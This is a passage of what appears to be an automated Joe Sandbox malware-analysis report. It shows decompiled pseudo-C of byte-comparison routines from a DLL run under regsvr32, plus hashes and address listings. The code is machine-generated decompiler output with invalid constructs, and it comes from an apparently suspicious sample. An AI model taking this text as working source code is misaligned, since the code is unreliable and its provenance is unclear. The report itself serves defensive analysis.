                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 333b62f324e643a57c38eebfdeb7fef7e5d5ab913db64279213bad01495ba2e4
                                                                                                                • Instruction ID: 810339caa7b7e7dac7ddd777d2ba548a2bd97b04b1e928128ab02b5f2e0daaec
                                                                                                                • Opcode Fuzzy Hash: 333b62f324e643a57c38eebfdeb7fef7e5d5ab913db64279213bad01495ba2e4
                                                                                                                • Instruction Fuzzy Hash: F802A233D09BB34B87B18EB940E05667BE1DE0259132F87F8DCC0AF286C216DC5996E4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1004B88A(void* __eax, void* __ecx) {
                                                                                                                				void* _t196;
                                                                                                                				signed int _t197;
                                                                                                                				void* _t200;
                                                                                                                				signed char _t206;
                                                                                                                				signed char _t207;
                                                                                                                				signed char _t208;
                                                                                                                				signed char _t210;
                                                                                                                				signed char _t211;
                                                                                                                				signed int _t216;
                                                                                                                				signed int _t316;
                                                                                                                				void* _t319;
                                                                                                                				void* _t321;
                                                                                                                				void* _t323;
                                                                                                                				void* _t325;
                                                                                                                				void* _t327;
                                                                                                                				void* _t330;
                                                                                                                				void* _t332;
                                                                                                                				void* _t334;
                                                                                                                				void* _t337;
                                                                                                                				void* _t339;
                                                                                                                				void* _t341;
                                                                                                                				void* _t344;
                                                                                                                				void* _t346;
                                                                                                                				void* _t348;
                                                                                                                				void* _t351;
                                                                                                                				void* _t353;
                                                                                                                				void* _t355;
                                                                                                                				void* _t358;
                                                                                                                				void* _t360;
                                                                                                                				void* _t362;
                                                                                                                
                                                                                                                				_t200 = __ecx;
                                                                                                                				_t196 = __eax;
                                                                                                                				if( *((intOrPtr*)(__eax - 0x1f)) ==  *((intOrPtr*)(__ecx - 0x1f))) {
                                                                                                                					_t316 = 0;
                                                                                                                					L17:
                                                                                                                					if(_t316 != 0) {
                                                                                                                						goto L1;
                                                                                                                					}
                                                                                                                					_t206 =  *(_t196 - 0x1b);
                                                                                                                					if(_t206 ==  *(_t200 - 0x1b)) {
                                                                                                                						_t316 = 0;
                                                                                                                						L28:
                                                                                                                						if(_t316 != 0) {
                                                                                                                							goto L1;
                                                                                                                						}
                                                                                                                						_t207 =  *(_t196 - 0x17);
                                                                                                                						if(_t207 ==  *(_t200 - 0x17)) {
                                                                                                                							_t316 = 0;
                                                                                                                							L39:
                                                                                                                							if(_t316 != 0) {
                                                                                                                								goto L1;
                                                                                                                							}
                                                                                                                							_t208 =  *(_t196 - 0x13);
                                                                                                                							if(_t208 ==  *(_t200 - 0x13)) {
                                                                                                                								_t316 = 0;
                                                                                                                								L50:
                                                                                                                								if(_t316 != 0) {
                                                                                                                									goto L1;
                                                                                                                								}
                                                                                                                								if( *(_t196 - 0xf) ==  *(_t200 - 0xf)) {
                                                                                                                									_t316 = 0;
                                                                                                                									L61:
                                                                                                                									if(_t316 != 0) {
                                                                                                                										goto L1;
                                                                                                                									}
                                                                                                                									_t210 =  *(_t196 - 0xb);
                                                                                                                									if(_t210 ==  *(_t200 - 0xb)) {
                                                                                                                										_t316 = 0;
                                                                                                                										L72:
                                                                                                                										if(_t316 != 0) {
                                                                                                                											goto L1;
                                                                                                                										}
                                                                                                                										_t211 =  *(_t196 - 7);
                                                                                                                										if(_t211 ==  *(_t200 - 7)) {
                                                                                                                											_t316 = 0;
                                                                                                                											L83:
                                                                                                                											if(_t316 != 0) {
                                                                                                                												goto L1;
                                                                                                                											}
                                                                                                                											_t319 = ( *(_t196 - 3) & 0x000000ff) - ( *(_t200 - 3) & 0x000000ff);
                                                                                                                											if(_t319 == 0) {
                                                                                                                												L5:
                                                                                                                												_t321 = ( *(_t196 - 2) & 0x000000ff) - ( *(_t200 - 2) & 0x000000ff);
                                                                                                                												if(_t321 == 0) {
                                                                                                                													L3:
                                                                                                                													_t197 = ( *(_t196 - 1) & 0x000000ff) - ( *(_t200 - 1) & 0x000000ff);
                                                                                                                													if(_t197 != 0) {
                                                                                                                														_t197 = (0 | _t197 > 0x00000000) + (0 | _t197 > 0x00000000) - 1;
                                                                                                                													}
                                                                                                                													L2:
                                                                                                                													return _t197;
                                                                                                                												}
                                                                                                                												_t216 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
                                                                                                                												if(_t216 != 0) {
                                                                                                                													L86:
                                                                                                                													_t197 = _t216;
                                                                                                                													goto L2;
                                                                                                                												} else {
                                                                                                                													goto L3;
                                                                                                                												}
                                                                                                                											}
                                                                                                                											_t216 = (0 | _t319 > 0x00000000) + (0 | _t319 > 0x00000000) - 1;
                                                                                                                											if(_t216 == 0) {
                                                                                                                												goto L5;
                                                                                                                											}
                                                                                                                											goto L86;
                                                                                                                										}
                                                                                                                										_t323 = (_t211 & 0x000000ff) - ( *(_t200 - 7) & 0x000000ff);
                                                                                                                										if(_t323 == 0) {
                                                                                                                											L76:
                                                                                                                											_t325 = ( *(_t196 - 6) & 0x000000ff) - ( *(_t200 - 6) & 0x000000ff);
                                                                                                                											if(_t325 == 0) {
                                                                                                                												L78:
                                                                                                                												_t327 = ( *(_t196 - 5) & 0x000000ff) - ( *(_t200 - 5) & 0x000000ff);
                                                                                                                												if(_t327 == 0) {
                                                                                                                													L80:
                                                                                                                													_t316 = ( *(_t196 - 4) & 0x000000ff) - ( *(_t200 - 4) & 0x000000ff);
                                                                                                                													if(_t316 != 0) {
                                                                                                                														_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                                                                                                                													}
                                                                                                                													goto L83;
                                                                                                                												}
                                                                                                                												_t316 = (0 | _t327 > 0x00000000) + (0 | _t327 > 0x00000000) - 1;
                                                                                                                												if(_t316 != 0) {
                                                                                                                													goto L1;
                                                                                                                												}
                                                                                                                												goto L80;
                                                                                                                											}
                                                                                                                											_t316 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
                                                                                                                											if(_t316 != 0) {
                                                                                                                												goto L1;
                                                                                                                											}
                                                                                                                											goto L78;
                                                                                                                										}
                                                                                                                										_t316 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
                                                                                                                										if(_t316 != 0) {
                                                                                                                											goto L1;
                                                                                                                										}
                                                                                                                										goto L76;
                                                                                                                									}
                                                                                                                									_t330 = (_t210 & 0x000000ff) - ( *(_t200 - 0xb) & 0x000000ff);
                                                                                                                									if(_t330 == 0) {
                                                                                                                										L65:
                                                                                                                										_t332 = ( *(_t196 - 0xa) & 0x000000ff) - ( *(_t200 - 0xa) & 0x000000ff);
                                                                                                                										if(_t332 == 0) {
                                                                                                                											L67:
                                                                                                                											_t334 = ( *(_t196 - 9) & 0x000000ff) - ( *(_t200 - 9) & 0x000000ff);
                                                                                                                											if(_t334 == 0) {
                                                                                                                												L69:
                                                                                                                												_t316 = ( *(_t196 - 8) & 0x000000ff) - ( *(_t200 - 8) & 0x000000ff);
                                                                                                                												if(_t316 != 0) {
                                                                                                                													_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                                                                                                                												}
                                                                                                                												goto L72;
                                                                                                                											}
                                                                                                                											_t316 = (0 | _t334 > 0x00000000) + (0 | _t334 > 0x00000000) - 1;
                                                                                                                											if(_t316 != 0) {
                                                                                                                												goto L1;
                                                                                                                											}
                                                                                                                											goto L69;
                                                                                                                										}
                                                                                                                										_t316 = (0 | _t332 > 0x00000000) + (0 | _t332 > 0x00000000) - 1;
                                                                                                                										if(_t316 != 0) {
                                                                                                                											goto L1;
                                                                                                                										}
                                                                                                                										goto L67;
                                                                                                                									}
                                                                                                                									_t316 = (0 | _t330 > 0x00000000) + (0 | _t330 > 0x00000000) - 1;
                                                                                                                									if(_t316 != 0) {
                                                                                                                										goto L1;
                                                                                                                									}
                                                                                                                									goto L65;
                                                                                                                								}
                                                                                                                								_t337 = ( *(_t196 - 0xf) & 0x000000ff) - ( *(_t200 - 0xf) & 0x000000ff);
                                                                                                                								if(_t337 == 0) {
                                                                                                                									L54:
                                                                                                                									_t339 = ( *(_t196 - 0xe) & 0x000000ff) - ( *(_t200 - 0xe) & 0x000000ff);
                                                                                                                									if(_t339 == 0) {
                                                                                                                										L56:
                                                                                                                										_t341 = ( *(_t196 - 0xd) & 0x000000ff) - ( *(_t200 - 0xd) & 0x000000ff);
                                                                                                                										if(_t341 == 0) {
                                                                                                                											L58:
                                                                                                                											_t316 = ( *(_t196 - 0xc) & 0x000000ff) - ( *(_t200 - 0xc) & 0x000000ff);
                                                                                                                											if(_t316 != 0) {
                                                                                                                												_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                                                                                                                											}
                                                                                                                											goto L61;
                                                                                                                										}
                                                                                                                										_t316 = (0 | _t341 > 0x00000000) + (0 | _t341 > 0x00000000) - 1;
                                                                                                                										if(_t316 != 0) {
                                                                                                                											goto L1;
                                                                                                                										}
                                                                                                                										goto L58;
                                                                                                                									}
                                                                                                                									_t316 = (0 | _t339 > 0x00000000) + (0 | _t339 > 0x00000000) - 1;
                                                                                                                									if(_t316 != 0) {
                                                                                                                										goto L1;
                                                                                                                									}
                                                                                                                									goto L56;
                                                                                                                								}
                                                                                                                								_t316 = (0 | _t337 > 0x00000000) + (0 | _t337 > 0x00000000) - 1;
                                                                                                                								if(_t316 != 0) {
                                                                                                                									goto L1;
                                                                                                                								}
                                                                                                                								goto L54;
                                                                                                                							}
                                                                                                                							_t344 = (_t208 & 0x000000ff) - ( *(_t200 - 0x13) & 0x000000ff);
                                                                                                                							if(_t344 == 0) {
                                                                                                                								L43:
                                                                                                                								_t346 = ( *(_t196 - 0x12) & 0x000000ff) - ( *(_t200 - 0x12) & 0x000000ff);
                                                                                                                								if(_t346 == 0) {
                                                                                                                									L45:
                                                                                                                									_t348 = ( *(_t196 - 0x11) & 0x000000ff) - ( *(_t200 - 0x11) & 0x000000ff);
                                                                                                                									if(_t348 == 0) {
                                                                                                                										L47:
                                                                                                                										_t316 = ( *(_t196 - 0x10) & 0x000000ff) - ( *(_t200 - 0x10) & 0x000000ff);
                                                                                                                										if(_t316 != 0) {
                                                                                                                											_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                                                                                                                										}
                                                                                                                										goto L50;
                                                                                                                									}
                                                                                                                									_t316 = (0 | _t348 > 0x00000000) + (0 | _t348 > 0x00000000) - 1;
                                                                                                                									if(_t316 != 0) {
                                                                                                                										goto L1;
                                                                                                                									}
                                                                                                                									goto L47;
                                                                                                                								}
                                                                                                                								_t316 = (0 | _t346 > 0x00000000) + (0 | _t346 > 0x00000000) - 1;
                                                                                                                								if(_t316 != 0) {
                                                                                                                									goto L1;
                                                                                                                								}
                                                                                                                								goto L45;
                                                                                                                							}
                                                                                                                							_t316 = (0 | _t344 > 0x00000000) + (0 | _t344 > 0x00000000) - 1;
                                                                                                                							if(_t316 != 0) {
                                                                                                                								goto L1;
                                                                                                                							}
                                                                                                                							goto L43;
                                                                                                                						}
                                                                                                                						_t351 = (_t207 & 0x000000ff) - ( *(_t200 - 0x17) & 0x000000ff);
                                                                                                                						if(_t351 == 0) {
                                                                                                                							L32:
                                                                                                                							_t353 = ( *(_t196 - 0x16) & 0x000000ff) - ( *(_t200 - 0x16) & 0x000000ff);
                                                                                                                							if(_t353 == 0) {
                                                                                                                								L34:
                                                                                                                								_t355 = ( *(_t196 - 0x15) & 0x000000ff) - ( *(_t200 - 0x15) & 0x000000ff);
                                                                                                                								if(_t355 == 0) {
                                                                                                                									L36:
                                                                                                                									_t316 = ( *(_t196 - 0x14) & 0x000000ff) - ( *(_t200 - 0x14) & 0x000000ff);
                                                                                                                									if(_t316 != 0) {
                                                                                                                										_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                                                                                                                									}
                                                                                                                									goto L39;
                                                                                                                								}
                                                                                                                								_t316 = (0 | _t355 > 0x00000000) + (0 | _t355 > 0x00000000) - 1;
                                                                                                                								if(_t316 != 0) {
                                                                                                                									goto L1;
                                                                                                                								}
                                                                                                                								goto L36;
                                                                                                                							}
                                                                                                                							_t316 = (0 | _t353 > 0x00000000) + (0 | _t353 > 0x00000000) - 1;
                                                                                                                							if(_t316 != 0) {
                                                                                                                								goto L1;
                                                                                                                							}
                                                                                                                							goto L34;
                                                                                                                						}
                                                                                                                						_t316 = (0 | _t351 > 0x00000000) + (0 | _t351 > 0x00000000) - 1;
                                                                                                                						if(_t316 != 0) {
                                                                                                                							goto L1;
                                                                                                                						}
                                                                                                                						goto L32;
                                                                                                                					}
                                                                                                                					_t358 = (_t206 & 0x000000ff) - ( *(_t200 - 0x1b) & 0x000000ff);
                                                                                                                					if(_t358 == 0) {
                                                                                                                						L21:
                                                                                                                						_t360 = ( *(_t196 - 0x1a) & 0x000000ff) - ( *(_t200 - 0x1a) & 0x000000ff);
                                                                                                                						if(_t360 == 0) {
                                                                                                                							L23:
                                                                                                                							_t362 = ( *(_t196 - 0x19) & 0x000000ff) - ( *(_t200 - 0x19) & 0x000000ff);
                                                                                                                							if(_t362 == 0) {
                                                                                                                								L25:
                                                                                                                								_t316 = ( *(_t196 - 0x18) & 0x000000ff) - ( *(_t200 - 0x18) & 0x000000ff);
                                                                                                                								if(_t316 != 0) {
                                                                                                                									_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                                                                                                                								}
                                                                                                                								goto L28;
                                                                                                                							}
                                                                                                                							_t316 = (0 | _t362 > 0x00000000) + (0 | _t362 > 0x00000000) - 1;
                                                                                                                							if(_t316 != 0) {
                                                                                                                								goto L1;
                                                                                                                							}
                                                                                                                							goto L25;
                                                                                                                						}
                                                                                                                						_t316 = (0 | _t360 > 0x00000000) + (0 | _t360 > 0x00000000) - 1;
                                                                                                                						if(_t316 != 0) {
                                                                                                                							goto L1;
                                                                                                                						}
                                                                                                                						goto L23;
                                                                                                                					}
                                                                                                                					_t316 = (0 | _t358 > 0x00000000) + (0 | _t358 > 0x00000000) - 1;
                                                                                                                					if(_t316 != 0) {
                                                                                                                						goto L1;
                                                                                                                					}
                                                                                                                					goto L21;
                                                                                                                				} else {
                                                                                                                					__edx =  *(__ecx - 0x1f) & 0x000000ff;
                                                                                                                					__esi =  *(__eax - 0x1f) & 0x000000ff;
                                                                                                                					__esi = ( *(__eax - 0x1f) & 0x000000ff) - ( *(__ecx - 0x1f) & 0x000000ff);
                                                                                                                					if(__esi == 0) {
                                                                                                                						L10:
                                                                                                                						__esi =  *(__eax - 0x1e) & 0x000000ff;
                                                                                                                						__edx =  *(__ecx - 0x1e) & 0x000000ff;
                                                                                                                						__esi = ( *(__eax - 0x1e) & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
                                                                                                                						if(__esi == 0) {
                                                                                                                							L12:
                                                                                                                							__esi =  *(__eax - 0x1d) & 0x000000ff;
                                                                                                                							__edx =  *(__ecx - 0x1d) & 0x000000ff;
                                                                                                                							__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
                                                                                                                							if(__esi == 0) {
                                                                                                                								L14:
                                                                                                                								__esi =  *(__eax - 0x1c) & 0x000000ff;
                                                                                                                								__edx =  *(__ecx - 0x1c) & 0x000000ff;
                                                                                                                								__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
                                                                                                                								if(__esi != 0) {
                                                                                                                									0 = 0 | __esi > 0x00000000;
                                                                                                                									__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                									__esi = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                								}
                                                                                                                								goto L17;
                                                                                                                							}
                                                                                                                							0 = 0 | __esi > 0x00000000;
                                                                                                                							__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                							__esi = __edx;
                                                                                                                							if(__edx != 0) {
                                                                                                                								goto L1;
                                                                                                                							}
                                                                                                                							goto L14;
                                                                                                                						}
                                                                                                                						0 = 0 | __esi > 0x00000000;
                                                                                                                						__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                						__esi = __edx;
                                                                                                                						if(__edx != 0) {
                                                                                                                							goto L1;
                                                                                                                						}
                                                                                                                						goto L12;
                                                                                                                					}
                                                                                                                					0 = 0 | __esi > 0x00000000;
                                                                                                                					__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                					__esi = __edx;
                                                                                                                					if(__edx != 0) {
                                                                                                                						goto L1;
                                                                                                                					}
                                                                                                                					goto L10;
                                                                                                                				}
                                                                                                                				L1:
                                                                                                                				_t197 = _t316;
                                                                                                                				goto L2;
                                                                                                                			}

































                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004ba38
                                                                                                                0x1004ba3e
                                                                                                                0x1004babd
                                                                                                                0x1004babf
                                                                                                                0x1004bac1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004bacd
                                                                                                                0x1004bb4d
                                                                                                                0x1004bb4f
                                                                                                                0x1004bb51
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004bb57
                                                                                                                0x1004bb5d
                                                                                                                0x1004bbdc
                                                                                                                0x1004bbde
                                                                                                                0x1004bbe0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004bbe6
                                                                                                                0x1004bbec
                                                                                                                0x1004bc6b
                                                                                                                0x1004bc6d
                                                                                                                0x1004bc6f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004bc7d
                                                                                                                0x1004bc7f
                                                                                                                0x1004b862
                                                                                                                0x1004b86a
                                                                                                                0x1004b86c
                                                                                                                0x1004b448
                                                                                                                0x1004b450
                                                                                                                0x1004b452
                                                                                                                0x1004b463
                                                                                                                0x1004b463
                                                                                                                0x1004b058
                                                                                                                0x1004bdb4
                                                                                                                0x1004bdb4
                                                                                                                0x1004b879
                                                                                                                0x1004b87f
                                                                                                                0x1004bc98
                                                                                                                0x1004bc98
                                                                                                                0x00000000
                                                                                                                0x1004b885
                                                                                                                0x00000000
                                                                                                                0x1004b885
                                                                                                                0x1004b87f
                                                                                                                0x1004bc8c
                                                                                                                0x1004bc92
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004bc92
                                                                                                                0x1004bbf5
                                                                                                                0x1004bbf7
                                                                                                                0x1004bc0e
                                                                                                                0x1004bc16
                                                                                                                0x1004bc18
                                                                                                                0x1004bc2f
                                                                                                                0x1004bc37
                                                                                                                0x1004bc39
                                                                                                                0x1004bc50
                                                                                                                0x1004bc58
                                                                                                                0x1004bc5a
                                                                                                                0x1004bc67
                                                                                                                0x1004bc67
                                                                                                                0x00000000
                                                                                                                0x1004bc5a
                                                                                                                0x1004bc46
                                                                                                                0x1004bc4a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004bc4a
                                                                                                                0x1004bc25
                                                                                                                0x1004bc29
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004bc29
                                                                                                                0x1004bc04
                                                                                                                0x1004bc08
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004bc08
                                                                                                                0x1004bb66
                                                                                                                0x1004bb68
                                                                                                                0x1004bb7f
                                                                                                                0x1004bb87
                                                                                                                0x1004bb89
                                                                                                                0x1004bba0
                                                                                                                0x1004bba8
                                                                                                                0x1004bbaa
                                                                                                                0x1004bbc1
                                                                                                                0x1004bbc9
                                                                                                                0x1004bbcb
                                                                                                                0x1004bbd8
                                                                                                                0x1004bbd8
                                                                                                                0x00000000
                                                                                                                0x1004bbcb
                                                                                                                0x1004bbb7
                                                                                                                0x1004bbbb
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004bbbb
                                                                                                                0x1004bb96
                                                                                                                0x1004bb9a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004bb9a
                                                                                                                0x1004bb75
                                                                                                                0x1004bb79
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004bb79
                                                                                                                0x1004bad7
                                                                                                                0x1004bad9
                                                                                                                0x1004baf0
                                                                                                                0x1004baf8
                                                                                                                0x1004bafa
                                                                                                                0x1004bb11
                                                                                                                0x1004bb19
                                                                                                                0x1004bb1b
                                                                                                                0x1004bb32
                                                                                                                0x1004bb3a
                                                                                                                0x1004bb3c
                                                                                                                0x1004bb49
                                                                                                                0x1004bb49
                                                                                                                0x00000000
                                                                                                                0x1004bb3c
                                                                                                                0x1004bb28
                                                                                                                0x1004bb2c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004bb2c
                                                                                                                0x1004bb07
                                                                                                                0x1004bb0b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004bb0b
                                                                                                                0x1004bae6
                                                                                                                0x1004baea
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004baea
                                                                                                                0x1004ba47
                                                                                                                0x1004ba49
                                                                                                                0x1004ba60
                                                                                                                0x1004ba68
                                                                                                                0x1004ba6a
                                                                                                                0x1004ba81
                                                                                                                0x1004ba89
                                                                                                                0x1004ba8b
                                                                                                                0x1004baa2
                                                                                                                0x1004baaa
                                                                                                                0x1004baac
                                                                                                                0x1004bab9
                                                                                                                0x1004bab9
                                                                                                                0x00000000
                                                                                                                0x1004baac
                                                                                                                0x1004ba98
                                                                                                                0x1004ba9c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004ba9c
                                                                                                                0x1004ba77
                                                                                                                0x1004ba7b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004ba7b
                                                                                                                0x1004ba56
                                                                                                                0x1004ba5a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004ba5a
                                                                                                                0x1004b9b8
                                                                                                                0x1004b9ba
                                                                                                                0x1004b9d1
                                                                                                                0x1004b9d9
                                                                                                                0x1004b9db
                                                                                                                0x1004b9f2
                                                                                                                0x1004b9fa
                                                                                                                0x1004b9fc
                                                                                                                0x1004ba13
                                                                                                                0x1004ba1b
                                                                                                                0x1004ba1d
                                                                                                                0x1004ba2a
                                                                                                                0x1004ba2a
                                                                                                                0x00000000
                                                                                                                0x1004ba1d
                                                                                                                0x1004ba09
                                                                                                                0x1004ba0d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004ba0d
                                                                                                                0x1004b9e8
                                                                                                                0x1004b9ec
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b9ec
                                                                                                                0x1004b9c7
                                                                                                                0x1004b9cb
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b9cb
                                                                                                                0x1004b929
                                                                                                                0x1004b92b
                                                                                                                0x1004b942
                                                                                                                0x1004b94a
                                                                                                                0x1004b94c

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                • Instruction ID: 7b5a7c5434aea4c44cb1393324e9d8359c5f3d1551e4eab25712ed6b60d88d4d
                                                                                                                • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                • Instruction Fuzzy Hash: 30D16F73C0EDF30683B5C12D409822EEBA2AFC159132BC3F59CD47F389966A5D5496D4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1004B46A(void* __eax, void* __ecx) {
                                                                                                                				void* _t191;
                                                                                                                				signed int _t192;
                                                                                                                				void* _t195;
                                                                                                                				signed char _t201;
                                                                                                                				signed char _t202;
                                                                                                                				signed char _t203;
                                                                                                                				signed char _t204;
                                                                                                                				signed char _t206;
                                                                                                                				signed int _t211;
                                                                                                                				signed int _t309;
                                                                                                                				void* _t312;
                                                                                                                				void* _t314;
                                                                                                                				void* _t316;
                                                                                                                				void* _t318;
                                                                                                                				void* _t321;
                                                                                                                				void* _t323;
                                                                                                                				void* _t325;
                                                                                                                				void* _t328;
                                                                                                                				void* _t330;
                                                                                                                				void* _t332;
                                                                                                                				void* _t335;
                                                                                                                				void* _t337;
                                                                                                                				void* _t339;
                                                                                                                				void* _t342;
                                                                                                                				void* _t344;
                                                                                                                				void* _t346;
                                                                                                                				void* _t349;
                                                                                                                				void* _t351;
                                                                                                                				void* _t353;
                                                                                                                
                                                                                                                				_t195 = __ecx;
                                                                                                                				_t191 = __eax;
                                                                                                                				if( *((intOrPtr*)(__eax - 0x1e)) ==  *((intOrPtr*)(__ecx - 0x1e))) {
                                                                                                                					_t309 = 0;
                                                                                                                					L15:
                                                                                                                					if(_t309 != 0) {
                                                                                                                						goto L1;
                                                                                                                					}
                                                                                                                					_t201 =  *(_t191 - 0x1a);
                                                                                                                					if(_t201 ==  *(_t195 - 0x1a)) {
                                                                                                                						_t309 = 0;
                                                                                                                						L26:
                                                                                                                						if(_t309 != 0) {
                                                                                                                							goto L1;
                                                                                                                						}
                                                                                                                						_t202 =  *(_t191 - 0x16);
                                                                                                                						if(_t202 ==  *(_t195 - 0x16)) {
                                                                                                                							_t309 = 0;
                                                                                                                							L37:
                                                                                                                							if(_t309 != 0) {
                                                                                                                								goto L1;
                                                                                                                							}
                                                                                                                							_t203 =  *(_t191 - 0x12);
                                                                                                                							if(_t203 ==  *(_t195 - 0x12)) {
                                                                                                                								_t309 = 0;
                                                                                                                								L48:
                                                                                                                								if(_t309 != 0) {
                                                                                                                									goto L1;
                                                                                                                								}
                                                                                                                								_t204 =  *(_t191 - 0xe);
                                                                                                                								if(_t204 ==  *(_t195 - 0xe)) {
                                                                                                                									_t309 = 0;
                                                                                                                									L59:
                                                                                                                									if(_t309 != 0) {
                                                                                                                										goto L1;
                                                                                                                									}
                                                                                                                									if( *(_t191 - 0xa) ==  *(_t195 - 0xa)) {
                                                                                                                										_t309 = 0;
                                                                                                                										L70:
                                                                                                                										if(_t309 != 0) {
                                                                                                                											goto L1;
                                                                                                                										}
                                                                                                                										_t206 =  *(_t191 - 6);
                                                                                                                										if(_t206 ==  *(_t195 - 6)) {
                                                                                                                											_t309 = 0;
                                                                                                                											L81:
                                                                                                                											if(_t309 != 0) {
                                                                                                                												goto L1;
                                                                                                                											}
                                                                                                                											if( *(_t191 - 2) ==  *(_t195 - 2)) {
                                                                                                                												_t192 = 0;
                                                                                                                												L3:
                                                                                                                												return _t192;
                                                                                                                											}
                                                                                                                											_t312 = ( *(_t191 - 2) & 0x000000ff) - ( *(_t195 - 2) & 0x000000ff);
                                                                                                                											if(_t312 == 0) {
                                                                                                                												L4:
                                                                                                                												_t192 = ( *(_t191 - 1) & 0x000000ff) - ( *(_t195 - 1) & 0x000000ff);
                                                                                                                												if(_t192 != 0) {
                                                                                                                													_t192 = (0 | _t192 > 0x00000000) + (0 | _t192 > 0x00000000) - 1;
                                                                                                                												}
                                                                                                                												goto L3;
                                                                                                                											}
                                                                                                                											_t211 = (0 | _t312 > 0x00000000) + (0 | _t312 > 0x00000000) - 1;
                                                                                                                											if(_t211 != 0) {
                                                                                                                												_t192 = _t211;
                                                                                                                												goto L3;
                                                                                                                											}
                                                                                                                											goto L4;
                                                                                                                										}
                                                                                                                										_t314 = (_t206 & 0x000000ff) - ( *(_t195 - 6) & 0x000000ff);
                                                                                                                										if(_t314 == 0) {
                                                                                                                											L74:
                                                                                                                											_t316 = ( *(_t191 - 5) & 0x000000ff) - ( *(_t195 - 5) & 0x000000ff);
                                                                                                                											if(_t316 == 0) {
                                                                                                                												L76:
                                                                                                                												_t318 = ( *(_t191 - 4) & 0x000000ff) - ( *(_t195 - 4) & 0x000000ff);
                                                                                                                												if(_t318 == 0) {
                                                                                                                													L78:
